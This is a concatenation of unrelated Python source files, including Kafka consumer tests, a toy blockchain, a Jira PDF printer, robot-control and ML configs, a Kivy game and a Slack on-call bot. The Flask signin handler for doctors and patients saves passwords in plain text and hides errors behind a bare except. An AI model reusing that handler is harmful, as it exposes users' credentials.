tests/stateful_consumer/test_bootstrap_state.py0 from unittest.mock import patch from snuba.datasets.storages import StorageKey from snuba.datasets.storages.factory import get_cdc_storage from snuba.stateful_consumer import ConsumerStateCompletionEvent from snuba.consumers.strict_consumer import StrictConsumer from snuba.stateful_consumer.states.bootstrap import BootstrapState from tests.backends.confluent_kafka import ( FakeConfluentKafkaConsumer, build_confluent_kafka_message, ) class TestBootstrapState: def __consumer(self, on_message) -> StrictConsumer: return StrictConsumer( topic="topic", bootstrap_servers="somewhere", group_id="something", auto_offset_reset="earliest", partition_assignment_timeout=1, on_partitions_assigned=None, on_partitions_revoked=None, on_message=on_message, ) @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_empty_topic(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.NO_SNAPSHOT assert kafka_consumer.commit_calls == 0 @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_snapshot_for_other_table(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message( 0, 0, b'{"snapshot-id":"abc123", "tables": ["someone_else"], "product":"snuba", "event":"snapshot-init"}', False, ), build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.NO_SNAPSHOT assert kafka_consumer.commit_calls == 1 @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_init_snapshot(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message( 0, 0, b'{"snapshot-id":"abc123", "tables": 
["sentry_groupedmessage"], "product":"snuba", "event":"snapshot-init"}', False, ), build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.SNAPSHOT_INIT_RECEIVED assert kafka_consumer.commit_calls == 0 @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_snapshot_loaded(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message( 0, 0, b'{"snapshot-id":"abc123", "product":"somewhere-else", "tables": [], "event":"snapshot-init"}', False, ), build_confluent_kafka_message( 1, 0, b'{"snapshot-id":"abc123", "product":"snuba", "tables": ["sentry_groupedmessage"], "event":"snapshot-init"}', False, ), build_confluent_kafka_message( 2, 0, ( b'{"snapshot-id":"abc123", "event":"snapshot-loaded",' b'"transaction-info": {"xmin":123, "xmax":124, "xip-list": []}' b"}" ), False, ), build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.SNAPSHOT_READY_RECEIVED assert kafka_consumer.commit_calls == 2 import os import json import base64 def profile_path(profile_id, profile): """Create full path to given provide for the current user.""" user = os.path.expanduser("~") return os.path.join(user, profile_id + profile) def load_profile(f): return json.loads(base64.decodestring(open(f, 'rb').read()).encode('utf-8')) def load_from_json(file_path): """Load the stored data from json, and return as a dict.""" if os.path.exists(file_path): raw_data = open(file_path, 'rb').read() return json.loads(base64.decodestring(raw_data).decode('utf-8')) def dump_to_json(file_path, data): with open(file_path, 'wb') as f: json_data = json.dumps(data) try: f.write(base64.encodestring(json_data)) except: f.write(base64.encodestring(bytes(json_data, 'utf-8'))) user_python_daemon/user_python_daemon.py0 # Copyright 2014 icasdri __author__ = 'icasdri' import argparse import os.path import configparser import sys import importlib import logging log = logging.getLogger(__name__) DESCRIPTION = "..." 
VERSION = 0.1 NO_OPTIONS = [] def _parse_args(options=None): a_parser = argparse.ArgumentParser(prog="user-python-daemon", description=DESCRIPTION) a_parser.add_argument("--config-file", type=str, help="configuration file to use") a_parser.add_argument("--version", action='version', version="%(prog)s v{}".format(VERSION)) a_parser.add_argument("--debug", action='store_true') if options is None: args = a_parser.parse_args() else: args = a_parser.parse_args(options) if args.debug: log.setLevel(logging.DEBUG) handler = logging.StreamHandler(sys.stdout) log.addHandler(handler) modules = [] module_paths = [] if args.config_file is None: args.config_file = os.path.expanduser("~/.config/user_python_daemon.conf") if os.path.isfile(args.config_file): log.info("Using config file {}".format(args.config_file)) c_parser = configparser.ConfigParser() c_parser.read(args.config_file) for name in c_parser.sections(): section = c_parser[name] if "path" in section: module_paths.append(os.path.expanduser(section["path"])) if "options" in section: module = (name, section["options"].split()) else: module = (name, NO_OPTIONS) modules.append(module) return modules, module_paths def main(options=None): modules, module_paths = _parse_args(options) from dbus.mainloop.glib import DBusGMainLoop from gi.repository.GObject import MainLoop DBusGMainLoop(set_as_default=True) for path in set(module_paths): log.info("Appending path {}".format(path)) sys.path.append(path) for module_name, module_options in modules: log.info("Invoking entry_point() on module {} with options {}".format(module_name, module_options)) importlib.import_module(module_name).entry_point(module_options) log.info("Entering MainLoop") MainLoop().run() if __name__ == "__main__": main() import datetime import inquirer import json import requests from objects import Block def startup(): configs = [ inquirer.List( 'new', message='Are you generating a new blockchain or participating in an existing one?', choices=['new blockchain', 'existing blockchain'], default='new blockchain' ), inquirer.Text( 'num', message='How many blocks should be generated in the initial chain?', default='10', ), ] start = inquirer.prompt(configs) if start['new'] == 'new blockchain': return initialize_chain(int(start['num'])) else: return [] def _placeholder_algorithm(i, prev_proof, modulo=10): return (i % modulo == 0 and i % prev_proof == 0) def prove_work(prev_proof): i = prev_proof + 1 while not _placeholder_algorithm(i, prev_proof): i += 1 return i def make_genesis_block(): genesis = Block( index=0, timestamp=datetime.datetime.now(), data={'proof': 1}, prev_hash='0' ) print( f'Genesis block has been added to blockchain [ length: 1 ]\n' f'Hash: {genesis.hash}\n' ) return genesis def make_next_block(prev_block, data=None): index = prev_block.index + 1 timestamp = datetime.datetime.now() next_hash = prev_block.hash if not data: data = {'proof': prove_work(prev_block.data['proof'])} return Block(index, timestamp, data, next_hash) def initialize_chain(num_blocks): # account for 'free' genesis block n = num_blocks - 1 print(f'Initializing blockchain with {num_blocks} blocks\n') blockchain = [make_genesis_block()] prev_block = blockchain[0] for i in range(n): block = make_next_block(prev_block) blockchain.append(block) print( f'Block #{block.index} has been added to blockchain [ length: {len(blockchain)} ]\n' f'Hash: {block.hash}\n' ) prev_block = block return blockchain def find_peer_chains(peers): """ Returns all other peer blockchains when passed a list of peer URLs """ peer_chains = 
[] for peer_node in peers: resp = requests.get(f'{peer_node}/blocks') block = json.loads(resp.content) peer_chains.append(block) return peer_chains def get_consensus_chain(peers): peer_chains = find_peer_chains(peers) # if the local chain is not currently the longest, # replace it with the longest one longest = blockchain for chain in peer_chains: if len(longest) < len(chain): longest = chain blockchain = longestjiraPrinter.py #!/usr/bin/python # -*- coding: utf-8 -*- import pdfkit import requests import json from xml.etree import ElementTree as ET from subprocess import call # # Take a list of issues IDs and return # - A list of issues with all of their fields # - A dictionnary of issue types icons # def getIssues(issueIDs): if len(issueIDs)%2 != 0: issueIDs.append("0") issues = [] issueTypesIcons = {} for ID in issueIDs: issue = getIssue(ID) issues.append(issue) if issue['issueType'] not in issueTypesIcons.keys(): icon = getIssueTypeIcon(issue['issueType'], issue['issueTypeIconUrl']); issueTypesIcons[issue['issueType']] = icon; return issues, issueTypesIcons # # Given an issue ID get its data from Jira # def getIssue(issueID): print("Downloading issue " + issueID) if issueID == 0: response= {} else: url = "http://" + host + ":" + port + "/rest/api/latest/issue/" + issueID querystring = {"fields": "summary,assignee,issuetype,timetracking,priority"} req = requests.get(url, auth=(username, password), params=querystring) response = json.loads(req._content) try: issueType = response['fields']['issuetype']['name'].encode('ascii', 'ignore') except: issueType = "" try: issueTypeIconUrl = response['fields']['issuetype']['iconUrl'] except: issueTypeIconUrl = "" try: summary = response['fields']['summary'].encode('ascii', 'ignore') except: summary = "" try: assignee = response['fields']['assignee']['name'].encode('ascii', 'ignore') except: assignee = "" try: priority = response['fields']['priority']['name'].encode('ascii', 'ignore') except: priority = "" try: estimatedTime = response['fields']['timetracking']['originalEstimate'].encode('ascii', 'ignore') except: estimatedTime = "" issue = dict( issueType = issueType, issueTypeIconUrl = issueTypeIconUrl, summary = summary, assignee = assignee, estimatedTime = "Duree: " + estimatedTime, reference = issueID, priority = "Priorite: " + priority ) return issue # # Given a issueType name and the URL to its logo # returned by Jira, write this image to a file # which will later be embed in the HTML document # def getIssueTypeIcon(issueType, url): print("Downloading image " + issueType) filename = "" if url: req = requests.get(url, auth=(username, password)) data = req._content filename = issueType + ".svg" with open("tmpFiles/" + filename, "w") as imageFile: imageFile.write(data); return filename def generateIssueHTML(issue, typesIcons): icon = typesIcons[issue['issueType']] br = ET.Element('br') # Create the div containing the issue div = ET.Element('div') div.set("class", "issue") divHeader = ET.Element('div') divHeader.set("class", "issue-header") div.append(divHeader) divContent = ET.Element("div") divContent.set("class", "issue-content") div.append(divContent) divFooter = ET.Element("div") divFooter.set("class", "issue-footer") div.append(divFooter) # Logo of the issue type imgIcon = ET.Element('img') divHeader.append(imgIcon) imgIcon.set('src', icon) # Reference of the issue spanReference = ET.Element('span') divHeader.append(spanReference) spanReference.text = issue['reference'] # Name of the assignee spanAssignee = ET.Element('span') 
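# Illustrative sketch (made-up values): the dict shape returned by getIssue()
# above and consumed by generateIssueHTML(); note that getIssue() prepends the
# "Duree:" and "Priorite:" labels itself.
_example_issue = dict(
    issueType="Bug",
    issueTypeIconUrl="http://jira.example.com/images/icons/bug.svg",
    summary="Fix login crash",
    assignee="jdoe",
    estimatedTime="Duree: 2h",
    reference="PROJ-123",
    priority="Priorite: High",
)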
divHeader.append(spanAssignee) spanAssignee.text = issue['assignee'] spanAssignee.set("class", "assignee") div.append(br) # Summary of the issue spanSummary = ET.Element('span') divContent.append(spanSummary) spanSummary.text = issue['summary'] spanSummary.set("class", "summary") div.append(br) # Priority of the issue spanPriority = ET.Element('span') divFooter.append(spanPriority) spanPriority.text = issue['priority'] div.append(br) # Estimated time to spend spanEstimatedTime = ET.Element('span') spanEstimatedTime.set("class", "estimated-time") divFooter.append(spanEstimatedTime) spanEstimatedTime.text = issue['estimatedTime'] return div # # From the list of parsed issues and the list of issues types icons # generate an HTML document which will later be used to generate # the final PDF # def generateHTML(listOfIssues, typesIcons): html = ET.Element('html') body = ET.Element('body') br = ET.Element('br') html.append(body) divs = [] for issue in listOfIssues: div = generateIssueHTML(issue, typesIcons) divs.append(div) it = iter(divs) for x in it: div1 = x div2 = next(it) line = ET.Element('div') line.set("class", "container") line.append(div1) line.append(div2) body.append(line) ET.ElementTree(html).write(open('./tmpFiles/issues.html', 'w'), encoding='ascii', method='html') styleString = """ """ with open('./tmpFiles/issues.html', 'a') as f: f.write(styleString) # # Generate the PDF file from the HTML file generated earlier # def generatePDFFromHtml(): print("Generating PDF") pdfkit.from_file('./tmpFiles/issues.html', 'issues.pdf') # # Read the config.json file to know # the jira host and the credentials # def readConfig(): global username global password global host global port # Read username and password from config file config = json.load(open('./config.json')) username = config['username'] password = config['password'] host = config['host'] port = config['port'] # # Executed no matter what happens # Delete the tmpFiles folder used to write different # temporary files during the creation process # def cleanup(): print("Cleaning up tmp files") # call(["rm", "-r", "tmpFiles"]) # # Read the list of issues from a text file in # the file system # def readIssueIDs(): with open('./issues.txt', 'r') as f: content = f.readlines() issues = [x.strip() for x in content] return issues def main(): try: # Create the temp directory call(["mkdir", "-p", "tmpFiles"]) # Initialize needed variables readConfig() issueList=readIssueIDs() if not issueList: print("No issues in issues.txt, terminating") return # Get the issues from Jira issues, typesIcons = getIssues(issueList) # Generate the HTML file used to create the PDF generateHTML(issues, typesIcons) # Generate the PDF file to print generatePDFFromHtml() finally: # Remove the temp directory cleanup() if __name__ == "__main__": main() import numpy as np from metaworld.policies.action import Action from metaworld.policies.policy import Policy, assert_fully_parsed, move hack = False class SawyerPegInsertionSideV2Policy(Policy): @staticmethod def _parse_obs(obs): if np.allclose(obs[:3], np.array([0, 0.6, 0.2]), rtol=0.1, atol=0.1) and (abs(obs[6] - 0.02) < 0.01): global hack hack = False return { 'hand_pos': obs[:3], 'gripper_distance_apart': obs[3], 'peg_pos': obs[4:7], 'peg_rot': obs[7:11], 'goal_pos': obs[-3:], 'unused_info_curr_obs': obs[11:18], '_prev_obs': obs[18:36] } def get_action(self, obs): o_d = self._parse_obs(obs) action = Action({ 'delta_pos': np.arange(3), 'grab_effort': 3 }) action['delta_pos'] = move(o_d['hand_pos'], 
                                         to_xyz=self._desired_pos(o_d), p=25.)
        action['grab_effort'] = self._grab_effort(o_d)

        return action.array

    @staticmethod
    def _desired_pos(o_d):
        pos_curr = o_d['hand_pos']
        pos_peg = o_d['peg_pos']
        # lowest X is -.35, doesn't matter if we overshoot
        # Y is given by hole_vec
        # Z is constant at .16
        pos_hole = np.array([-.35, o_d['goal_pos'][1], .16])
        global hack
        if not hack:
            if np.linalg.norm(pos_curr[:2] - pos_peg[:2]) > .04:
                return pos_peg + np.array([.0, .0, .3])
            elif abs(pos_curr[2] - pos_peg[2]) > .025:
                return pos_peg
            else:
                hack = True
        if hack:
            if np.linalg.norm(pos_peg[1:] - pos_hole[1:]) > 0.04:
                return pos_hole + np.array([.5, .0, .0])
            else:
                return pos_hole

    @staticmethod
    def _grab_effort(o_d):
        pos_curr = o_d['hand_pos']
        pos_peg = o_d['peg_pos']

        if np.linalg.norm(pos_curr[:2] - pos_peg[:2]) > 0.04 \
                or abs(pos_curr[2] - pos_peg[2]) > 0.15:
            return -1.
        else:
            return .6


class Config(object):
    env = 'default'
    backbone = 'resnet18'
    classify = 'softmax'
    num_classes = 5000
    metric = 'arc_margin'
    easy_margin = False
    use_se = False
    loss = 'focal_loss'
    display = False
    finetune = False

    meta_train = '/preprocessed/train_meta.csv'
    train_root = '/preprocessed'
    train_list = 'full_data_train.txt'
    val_list = 'full_data_val.txt'

    checkpoints_path = 'checkpoints'
    save_interval = 1

    train_batch_size = 32  # batch size
    input_shape = (630, 80)
    mp3aug_ratio = 1.0
    npy_aug = True

    optimizer = 'sgd'
    use_gpu = True  # use GPU or not
    gpu_id = '0, 1'
    num_workers = 0  # how many workers for loading data
    print_freq = 100  # print info every N batch

    debug_file = '/tmp/debug'  # if os.path.exists(debug_file): enter ipdb
    result_file = '/result/submission.csv'

    max_epoch = 100
    lr = 1e-2  # initial learning rate
    lr_step = 10
    lr_decay = 0.5  # when val_loss increase, lr = lr*lr_decay
    weight_decay = 1e-1


#!/usr/bin/env python3
import numpy as np


def normalizeRatings(Y, R):
    #NORMALIZERATINGS Preprocess data by subtracting mean rating for every
    #movie (every row)
    #   [Ynorm, Ymean] = NORMALIZERATINGS(Y, R) normalized Y so that each movie
    #   has a rating of 0 on average, and returns the mean rating in Ymean.
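    # Worked example (illustrative, not part of the original exercise code): for
    #   Y = [[5, 0],        R = [[1, 0],
    #        [4, 2]]             [1, 1]]
    # only rated entries (R == 1) are averaged, so Ymean = [5, 3] and
    # Ynorm = [[0, 0], [1, -1]]; unrated entries stay 0 in Ynorm.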
    #
    m, n = Y.shape
    Ymean = np.zeros(m)
    Ynorm = np.zeros(Y.shape)
    for i in range(m):
        idx = R[i, :] == 1
        Ymean[i] = np.mean(Y[i, idx])
        Ynorm[i, idx] = Y[i, idx] - Ymean[i]
    #end
    return Ynorm, Ymean
#end


from flask.views import MethodView
from flask import request, jsonify
from helpers.crypt import Crypt
from validators.patient_val import PatientSignin
from validators.doctor_val import DoctorSignin
from db.cloudant.cloudant_manager import CloudantManager

patient_schema = PatientSignin()
doctor_schema = DoctorSignin()
cm = CloudantManager()
crypt = Crypt()


class Signin(MethodView):

    def post(self):
        try:
            user_signin = request.get_json()
            if user_signin['role_d'] == "1":
                conn = cm.connect_service()
                my_db = cm.connect_db('health-db')
                if my_db == "error":
                    raise Exception
                docs = cm.get_query_by(my_db, user_signin['mail_d'], 'mail_d')
                if docs != []:
                    doc = docs[0]
                    return jsonify({'st': doc['doc']['mail_d']}), 403
                user_signin['password_d'] = (user_signin['password_d'])
                doc_msg = cm.add_doc(my_db, user_signin)
                if doc_msg == "ok":
                    return jsonify({'st': 'ok'}), 200
                elif doc_msg == "error":
                    return jsonify({'st': 'error'}), 403
            if user_signin['role_p'] == "2":
                conn = cm.connect_service()
                my_db = cm.connect_db('health-db')
                if my_db == "error":
                    raise Exception
                docs = cm.get_query_by(my_db, user_signin['mail_p'], 'mail_p')
                if docs != []:
                    doc = docs[0]
                    return jsonify({'st': doc['doc']['mail_p']}), 403
                user_signin['password_p'] = (user_signin['password_p'])
                doc_msg = cm.add_doc(my_db, user_signin)
                if doc_msg == "ok":
                    return jsonify({'st': 'ok'}), 200
                elif doc_msg == "error":
                    return jsonify({'st': 'error'}), 403
        except:
            return jsonify({"st": "error en registro"}), 403


# https://programmers.co.kr/learn/courses/30/lessons/42890#
from collections import defaultdict
from itertools import combinations


def solution(relation):
    answer = 0
    my_dict = defaultdict(set)
    for entity in relation:
        for i, col in enumerate(entity):
            my_dict[i].add(col)
    pk = []
    npk = []
    n = len(relation)
    for k, v in my_dict.items():
        if len(v) != n:
            npk.append(k)
        else:
            pk.append(k)
    answer += len(pk)
    i = 2
    cdk = []
    while i <= len(npk):
        for x in combinations(npk, i):
            flg = True
            for k in cdk:
                if sum(1 for tx in x if tx in k) == len(k):
                    flg = False
                    break
            if not flg:
                continue
            for j in range(n):
                key = "".join(relation[j][k] for k in x)
                my_dict[x].add(key)
            if len(my_dict[x]) == n:
                answer += 1
                cdk.append(x)
        i += 1
    return answer
jacobfulano/composer
# Copyright 2021 MosaicML. All Rights Reserved.
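# Usage sketch for the candidate-key solution() above (illustrative, made-up data):
# neither column is unique on its own, but the pair of columns is, so exactly one
# candidate key exists.
#   solution([["a", "1"], ["b", "1"], ["a", "2"]])  # -> 1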
from dataclasses import asdict, dataclass from composer.models.model_hparams import ModelHparams @dataclass class ResNet50Hparams(ModelHparams): def initialize_object(self): from composer.models import ResNet50 return ResNet50(**asdict(self)) from flask_wtf import FlaskForm from flask_wtf.file import FileField, FileRequired from wtforms import StringField, SelectField, validators class ClientsForm(FlaskForm): name = StringField('Наименование организации') category = SelectField('Категория', coerce=int, validators=[validators.optional()], choices=[(1, "Внешний рынок"), (2, "Внутренний рынок")], render_kw={'class': 'form-control'}) file = FileField('Логотип организации', validators=[FileRequired(u'File was empty!')], render_kw={'class': 'form-control'}) class ClientsEditForm(FlaskForm): name = StringField('Наименование организации') category = SelectField('Категория', coerce=int, validators=[validators.optional()], choices=[(1, "Внешний рынок"), (2, "Внутренний рынок")], render_kw={'class': 'form-control'}) class ClientsEditPhotoForm(FlaskForm): file = FileField('Изображение руководителя', validators=[FileRequired(u'File was empty!')], render_kw={'class': 'form-control'})SleepProgger/Kivent-Examples from kivy.app import App from kivy.uix.widget import Widget from kivy.clock import Clock from kivy.core.window import Window from random import randint, choice from math import radians, pi, sin, cos import kivent_core import kivent_cymunk from kivent_core.gameworld import GameWorld, ObjectProperty from kivent_core.managers.resource_managers import texture_manager from kivent_core.systems.renderers import RotateRenderer from kivent_core.systems.position_systems import PositionSystem2D from kivent_core.systems.rotate_systems import RotateSystem2D from kivy.properties import StringProperty, NumericProperty from functools import partial texture_manager.load_atlas('assets/background_objects.atlas') class TestGame(Widget): def __init__(self, **kwargs): super(TestGame, self).__init__(**kwargs) self.gameworld.init_gameworld( ['cymunk_physics', 'rotate_color_renderer', 'rotate', 'color', 'position', 'camera1'], callback=self.init_game) def init_game(self): self.setup_states() self.set_state() # set up click event self.ids.gameworld.bind(on_touch_down=self.on_mouse_click) # lol, we need this to stop clicks on our GUI to deselect the current asteroid self._btn_pane = self.ids.gamescreenmanager.ids.main_screen.ids.bottom_pane def setup_states(self): self.gameworld.add_state(state_name='main', systems_added=['rotate_color_renderer'], systems_removed=[], systems_paused=[], systems_unpaused=['rotate_color_renderer'], screenmanager_screen='main') def set_state(self): self.gameworld.state = 'main' def on_mouse_click(self, etype, event): # Check if we clicked the bottom pane. # A better way would be to make the "game viewport" smaller and # don't just overlay our GUI, but i failed to do this so far, so... if self._btn_pane.collide_point(*event.pos): return entities = self.gameworld.entities gameview = self.gameworld.system_manager['camera1'] if not self.app.selected_id is None: ent = entities[self.app.selected_id] ent.color.r = 255 # We need to handle scrolling offsets (TODO: zoom/scale) x, y = event.pos x = x - gameview.camera_pos[0] y = y - gameview.camera_pos[1] physics = self.gameworld.system_manager['cymunk_physics'] # if you want to select a region use physics.query_bb(...) 
hits = physics.query_segment((x,y), (x,y)) if len(hits) > 0: ent = entities[hits[0][0]] ent.color.r = 0 self.app.selected_id = ent.entity_id gameview.entity_to_focus = ent.entity_id gameview.focus_entity = True else: self.app.selected = None gameview.focus_entity = False def draw_some_stuff(self): gameview = self.gameworld.system_manager['camera1'] x, y = int(-gameview.camera_pos[0]), int(-gameview.camera_pos[1]) w, h = int(gameview.size[0] + x), int(gameview.size[1] + y) create_asteroid = self.create_asteroid for i in range(100): pos = (randint(x, w), randint(y, h)) ent_id = create_asteroid(pos) self.app.count += 100 def create_asteroid(self, pos): x_vel = randint(-250, 250) y_vel = randint(-250, 250) angle = radians(randint(-360, 360)) angular_velocity = radians(randint(-150, -150)) shape_dict = {'inner_radius': 0, 'outer_radius': 22, 'mass': 50, 'offset': (0, 0)} col_shape = {'shape_type': 'circle', 'elasticity': .5, 'collision_type': 1, 'shape_info': shape_dict, 'friction': 1.0} col_shapes = [col_shape] physics_component = {'main_shape': 'circle', 'velocity': (x_vel, y_vel), 'position': pos, 'angle': angle, 'angular_velocity': angular_velocity, 'vel_limit': 500, 'ang_vel_limit': radians(200), 'mass': 50, 'col_shapes': col_shapes} create_component_dict = {'cymunk_physics': physics_component, 'rotate_color_renderer': { 'texture': 'asteroid1', 'size': (45, 45), 'render': True }, 'color': (255,255,255,255), 'position': pos, 'rotate': 0, } component_order = ['position', 'rotate', 'color', 'rotate_color_renderer', 'cymunk_physics',] return self.gameworld.init_entity( create_component_dict, component_order) def destroy_asteroid(self, ent_id): if ent_id is None: return #TODO: check if entity is valid gameview = self.gameworld.system_manager['camera1'] gameview.entity_to_focus = None self.app.selected_id = None self.gameworld.remove_entity(ent_id) self.app.count -= 1 def set_asteroid_velocity(self, ent_id, vx=0, vy=0): if ent_id is None: return #TODO: check if entity is valid entities = self.gameworld.entities ent = entities[ent_id].cymunk_physics ent.body.velocity = (vx, vy) class YourAppNameApp(App): count = NumericProperty(0) fps = NumericProperty(0) selected_id = None selected_coords = ObjectProperty(None, allownone=True) selected_velocity = ObjectProperty(None, allownone=True) def __init__(self, **kwargs): App.__init__(self, **kwargs) Clock.schedule_once(self.update_stats, .5) def update_stats(self, dt): self.fps = int(Clock.get_fps()) if self.selected_id is None: self.selected_coords = None self.selected_velocity = None else: ent = self.root.gameworld.entities[self.selected_id] physics = ent.cymunk_physics self.selected_coords = (int(ent.position.x), int(ent.position.y)) self.selected_velocity = (physics.body.velocity.x, physics.body.velocity.y) Clock.schedule_once(self.update_stats, .5) if __name__ == '__main__': YourAppNameApp().run()BMeu/Aerarium """Roles and Permissions Revision ID: ff115a5ac985 Revises: Create Date: 2018-12-01 14:19:35.777572 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'ff115a5ac985' down_revision = '' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! 
### op.create_table('role', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=255), nullable=True), sa.Column('permissions', sa.BigInteger(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.add_column('user', sa.Column('role_id', sa.Integer(), nullable=True)) op.create_foreign_key(None, 'user', 'role', ['role_id'], ['id']) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint(None, 'user', type_='foreignkey') op.drop_column('user', 'role_id') op.drop_table('role') # ### end Alembic commands ### nnunet/configuration.py default_num_threads = 8 RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD = 3 # determines what threshold to use for resampling the low resolution axis # separately (with NN) import os nnUNet_raw_data_base = "./datasets" nnUNet_preprocessed = "./datasets/preprocess" RESULTS_FOLDER = "./datasets/trained_models" os.environ['CUDA_VISIBLE_DEVICES'] = '0, 1, 2, 3' DEBUG_MODE = True use_this_for_batch_size_computation_3D = 820000000 MIN_BATCHSIZE = 2 AXIS_2D = None # 0, 1, 2, None->argmax(orignal version) def set_paths(nnUNet_raw_data_base, nnUNet_preprocessed, RESULTS_FOLDER): os.environ['nnUNet_raw_data_base'] = nnUNet_raw_data_base os.environ['nnUNet_preprocessed'] = nnUNet_preprocessed os.environ['RESULTS_FOLDER'] = RESULTS_FOLDER set_paths(nnUNet_raw_data_base, nnUNet_preprocessed, RESULTS_FOLDER) from image_fetcher.download_images import multi_thread_image_download from image_fetcher.fetch_urls import fetch_images_from_yahoo from selenium import webdriver options = webdriver.ChromeOptions() options.add_argument("--no-sandbox") options.add_argument("--headless") driver = webdriver.Chrome("chromedriver.exe", options=options) search_term = "cat" total_images = 10 urls = fetch_images_from_yahoo(driver, search_term, total_images) driver.close() multi_thread_image_download( urls, headers={ "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" }, max_image_fetching_threads=1, image_download_timeout=5, directory=search_term, ) # Test imports import numpy as np import pandas as pd import lightgbm as lgb from bedrock_client.bedrock.analyzer.model_analyzer import ModelAnalyzer from bedrock_client.bedrock.analyzer import ModelTypes from bedrock_client.bedrock.api import BedrockApi from bedrock_client.bedrock.metrics.service import ModelMonitoringService from sklearn import metrics from sklearn.model_selection import train_test_split import streamlit as st def main(): print("All OK!") if __name__ == "__main__": main() oncall_slackbot/plugins/oncall.py # -*- coding: utf-8 -*- import logging import re from typing import Optional from pygerduty.v2 import ContactMethod # pylint: disable=import-error from oncall_slackbot.bot import listen_to, Message from oncall_slackbot.integrations import pagerduty LOGGER = logging.getLogger(__name__) CONTACT_METHOD_EMOTICON_BY_TYPE = { 'email_contact_method': ':email:', 'phone_contact_method': ':slack_call:', # Do not show anything for push or SMS notifications, since they duplicate the phone contact 'sms_contact_method': None, 'push_notification_contact_method': None, } def _get_contact_method_message(contact_method: ContactMethod, add_label: bool) -> Optional[str]: emoticon = CONTACT_METHOD_EMOTICON_BY_TYPE.get(contact_method.type) if not emoticon or (hasattr(contact_method, 'enabled') and not contact_method.enabled): return None label = '' if add_label: label = f' 
({contact_method.label})' return f'{emoticon} {contact_method.address}{label}' @listen_to(r'who is (?:currently )?on(?:-| |)call', re.IGNORECASE) def who_is_on_call(message: Message): if not pagerduty.is_configured(): LOGGER.debug('Pager duty settings are not configured, cannot retrieve current on call') return current_oncall = pagerduty.get_current_oncall() if not current_oncall: message.reply(f'No current on-call information found for schedule {pagerduty.get_schedule_id()}') return # Build up contact methods string contact_method_messages = [] user_name = pagerduty.get_user_name(current_oncall.user) if user_name: contact_method_messages.append(f':slack: @{user_name}') contact_methods = current_oncall.user.contact_methods.list(time_zone='MDT') for contact_method in contact_methods: # Only add label if there is no user name contact_method_message = _get_contact_method_message(contact_method, not user_name) if contact_method_message: contact_method_messages.append(contact_method_message) # Get formatted end time end_time = pagerduty.get_humanized_datetime(current_oncall.end, current_oncall.user.time_zone) message.reply_webapi(f'{current_oncall.user.name} is currently on call', in_thread=True, blocks=[ { "type": "section", "text": { "type": "mrkdwn", "text": f'*<{current_oncall.user.html_url}|{current_oncall.user.name}>* is on call ' f'<{current_oncall.schedule.html_url}|until {end_time}>' } }, { "type": "section", "text": { "type": "mrkdwn", "text": '\n'.join(contact_method_messages) } }, ]) 0 import numpy as np import matplotlib.pyplot as plt import csv def load_data(path): with open(path, 'r') as f: reader = csv.reader(f, delimiter=',') header = next(reader) data = np.array(list(reader)).astype(float) return header, data if __name__ == '__main__': header, data = load_data('data/name-of-experiment/name-of-experiment_2021_11_19_14_23_55_0000--s-0/progress.csv') ns = range(data.shape[0]) print(header) print(header[10]) print(header[11]) print(header[12]) avs = data[:,11] maxs = data[:,10] mins = data[:,12] # method = "mixed" plt.fill_between(ns, mins, maxs, alpha=0.1) plt.plot(ns, avs, '-o', markersize=1, label="Train") plt.legend() plt.grid(True) plt.xlabel('Time step', fontsize = 15) plt.ylabel('Return', fontsize = 15) plt.title("SAC PCA", fontsize = 24) plt.savefig("plots/SAC PCA.png")from __future__ import unicode_literals from frappe import _ def get_data(): return [ { "label": _("Master"), "items": [ { "type": "doctype", "name": "Master Mobil" }, { "type": "doctype", "name": "Master Tipe Mobil" }, { "type": "doctype", "name": "Master Customer" }, { "type": "doctype", "name": "Master Driver" } ] }, { "label": _("Order List"), "items": [ { "type": "doctype", "name": "Dafatar Pesananan" }, { "type": "doctype", "name": "Kontrak Payung" }, { "type": "doctype", "name": "Pengembalian Mobil" }, { "type": "doctype", "name": "Sales Order Rent Car" } ] } ]mppwrapper/wrapper.py0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ @author: valengo """ from multiprocessing import Pool from multiprocessing import freeze_support from multiprocessing import cpu_count from typing import Callable, Any class MPPoolWrapper(object): """ Handle tasks multiprocessing using 